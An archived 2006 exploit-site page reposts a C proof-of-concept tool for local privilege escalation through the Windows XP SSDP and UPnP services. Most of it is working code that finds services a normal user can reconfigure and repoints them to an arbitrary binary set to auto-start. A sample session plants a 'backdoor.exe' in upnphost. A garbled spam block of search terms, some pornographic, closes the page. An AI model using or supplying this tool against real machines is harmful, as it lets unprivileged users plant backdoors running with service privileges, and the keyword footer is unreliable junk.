about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Microsoft Windows SSDP and UPnP Services Local Privilege Escalation Exploit



2006-02-02 Microsoft Windows SSDP and UPnP Services Local Privilege Escalation Exploit 
Rated as : Moderate Risk 
Note : Proof of concept

/*
* Privilege Checker for Windows Services
* (c) 2006 Andres Tarasco ( atarasco _at_ gmail.com )
* http://www.haxorcitos.com
*
* Based on Sudhakar Govindavajhala and Andrew Appel paper
* http://www.cs.princeton.edu/~sudhakar/papers/winval.pdf
*
* usage:
* You should execute this tool without Admin privileges on the target
system
* using for example an user account
*
* srvcheck.exe -l - show vulnerable services
* srvcheck.exe -m Service PATH - modify service configuration (install
backdoor)
*
* Example for Windows XP SP2 computer

D:\>whoami
HXR\test

D:\>net user test |find "grupo"
Miembros del grupo local *Usuarios
Miembros del grupo global *Ninguno

D:\>srvchecker.exe -l
Services Permissions checker
[SSDPSRV] Servicio de descubrimientos SSDP
Status: 0x1
Path: C:\WINDOWS\System32\svchost.exe -k LocalService

[upnphost] Host de dispositivo Plug and Play universal
Status: 0x1
Path: C:\WINDOWS\System32\svchost.exe -k LocalService

You were Lucky. 2 services found

D:\>srvchecker -m upnphost c:\windows\temp\backdoor.exe
Services Permissions checker
(c) 2006 Andres Tarasco - atarasco _at_ gmail.com

service modified =)

D:\>net start upnphost
*
* NOTE: This code compiles under Borland C++ Builder
*
*/
#include <stdio.h>
#include <windows.h>

void doFormatMessage( unsigned int dwLastErr );

int main(int argc, char* argv[])
{

SC_HANDLE SCM;
LPENUM_SERVICE_STATUS_PROCESS lpServices;
unsigned int n;
DWORD nSize = 0;
DWORD nServicesReturned;
DWORD nResumeHandle;
DWORD dwServiceType;
SC_HANDLE Svc;
LPQUERY_SERVICE_CONFIG lpConfig;
DWORD dwByteNeeded;
char SrvName[256],SrvDesc[256];
BYTE LIST=0;
unsigned int l=0;

printf(" Services Permissions checker\n");
printf(" (c) 2006 Andres Tarasco - atarasco _at_
gmail.com\n\n");

if ( ( (argc==1) || (argc>5) ) ||
( (argc==2) && (strcmp(argv[1],"-l")!=0) ) ||
( (argc==4) && (strcmp(argv[1],"-m")!=0) )
) {
printf("Usage:\n\t-l (list vulnerable services)\n");
printf("\t-m SRVNAME NewPath (change the configuration for that
service)\n");
exit(1);
}

if (argv[1][1]=='l') {
LIST=1;
SCM = OpenSCManager(NULL,NULL,SC_MANAGER_ENUMERATE_SERVICE);
}else {
SCM = OpenSCManager(NULL,NULL,STANDARD_RIGHTS_WRITE);
}
if (!SCM){
printf("OpenScManager FAILED\n");
doFormatMessage(GetLastError());
exit(-1);
}

if (LIST) {
nResumeHandle = 0;
dwServiceType = SERVICE_WIN32 | SERVICE_DRIVER;
lpServices = (LPENUM_SERVICE_STATUS_PROCESS) LocalAlloc(LPTR, 65535);
if (!lpServices) {
printf("LocalAlloc Failed\n");
exit(-1);
}
memset(lpServices,'\0',sizeof(lpServices));
if (EnumServicesStatusEx(SCM, SC_ENUM_PROCESS_INFO,
dwServiceType, SERVICE_STATE_ALL,
(LPBYTE)lpServices, 65535,
&nSize, &nServicesReturned,
&nResumeHandle, NULL) == 0) {
printf("EnumServicesStatusEx FAILED\n");
exit(-1);
}

for (n = 0; n < nServicesReturned; n++) {
Svc = OpenService(SCM,lpServices[n].lpServiceName, SERVICE_CHANGE_CONFIG |

SC_MANAGER_ENUMERATE_SERVICE |GENERIC_READ);
if (Svc!=NULL) {
l++;
printf("[%s]\t\t%s\n",lpServices[n].lpServiceName,
lpServices[n].lpDisplayName);
printf("Status:
0x%x\n",lpServices[n].ServiceStatusProcess.dwCurrentState);
dwByteNeeded = 0;
lpConfig = (LPQUERY_SERVICE_CONFIG) LocalAlloc(LPTR, 1024);
if (QueryServiceConfig(Svc, lpConfig, 1024, &dwByteNeeded)!=0) {
printf("Path: %s\n\n",lpConfig->lpBinaryPathName);
}else {
doFormatMessage(GetLastError());
}
}
}
} else {
Svc = OpenService(SCM,argv[2],SERVICE_CHANGE_CONFIG |
STANDARD_RIGHTS_WRITE);
if (Svc!=NULL) {
if (ChangeServiceConfig(
Svc,
SERVICE_NO_CHANGE,
SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE,
argv[3],
NULL,
NULL,
"",
NULL,
NULL,
NULL)!=0) {
printf("service modified =)\n");
} else {
printf("modification failed\n");
}
} else {
printf("Unable to open Service %s\n",argv[2]);
}
}

if ( (LIST) && (l>0) ) {
printf("\n You were Lucky. %i services found\n",l);
} else {
printf("\No luck\n");

}
CloseServiceHandle(SCM);
LocalFree(lpServices);
return(1);
}

void doFormatMessage( unsigned int dwLastErr ) {
char cadena[512];
LPVOID lpMsgBuf;
FormatMessage(
FORMAT_MESSAGE_ALLOCATE_BUFFER |
FORMAT_MESSAGE_IGNORE_INSERTS |
FORMAT_MESSAGE_FROM_SYSTEM,
NULL,
dwLastErr,
MAKELANGID( LANG_NEUTRAL, SUBLANG_DEFAULT ),
(LPTSTR) &lpMsgBuf,
0,
NULL );
sprintf(cadena,"ERRORCODE %i: %s\n", dwLastErr, lpMsgBuf);
printf("Error: %s\n",cadena);
LocalFree( lpMsgBuf );
}
securitydot.net - 2006-02-02

Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 11:30:37 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.xxx3x. sex gerle www.shang0 www.qcjob. mambo Remo Windows Me www.hjdevi Se. CMS is Fre php-nuke+2 php-nuke+2 http:/www. www.trisha Teenpussyp www.hs128. japan sex /viewscree www.1smt.c scs ssh IP.Board 2 Butt.com asin porn rk147 assphotos maslaroom php-nuke+2 php-nuke+2 IP.Board 2 Fuk.Ass www.vieods IPD imgsrc ru naked lady phpbb 2 Shakhila p www.wangzh +yabb+2.1 8166775712 Gerlsex.ht lo660l maxcpm.inf blacks on www.huihao www.cn-ddo 200 /compo PhpAuction www.xxx3x. mambo Remo remote exp Se.